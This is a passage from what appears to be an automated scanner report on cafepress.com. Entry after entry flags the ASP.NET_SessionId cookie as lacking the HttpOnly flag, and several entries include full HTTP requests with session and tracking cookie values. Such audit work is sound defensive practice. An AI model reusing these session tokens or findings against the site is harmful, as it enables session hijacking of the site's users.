tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.49. http://www.cafepress.com/cp/info/help/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/info/help/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

3.50. http://www.cafepress.com/cp/info/help/index.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/info/help/index.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

3.51. http://www.cafepress.com/cp/info/sell/index.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/info/sell/index.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

3.52. http://www.cafepress.com/cp/moredetails.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/moredetails.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

3.53. http://www.cafepress.com/cp/products/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/products/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

3.54. http://www.cafepress.com/cp/sitemap/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/sitemap/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/sitemap/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.55. http://www.cafepress.com/cp/tags/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/tags/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

3.56. http://www.cafepress.com/cp/viewcart.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/viewcart.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

3.57. http://www.cafepress.com/make/birth-announcements previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/birth-announcements

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/birth-announcements HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.58. http://www.cafepress.com/make/custom-baby-gear previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-baby-gear

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-baby-gear HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.59. http://www.cafepress.com/make/custom-buttons previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-buttons

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.60. http://www.cafepress.com/make/custom-hats previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-hats

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-hats HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.61. http://www.cafepress.com/make/custom-hoodies-sweatshirts previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-hoodies-sweatshirts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-hoodies-sweatshirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.62. http://www.cafepress.com/make/custom-ipad-case previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-ipad-case

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-ipad-case HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; 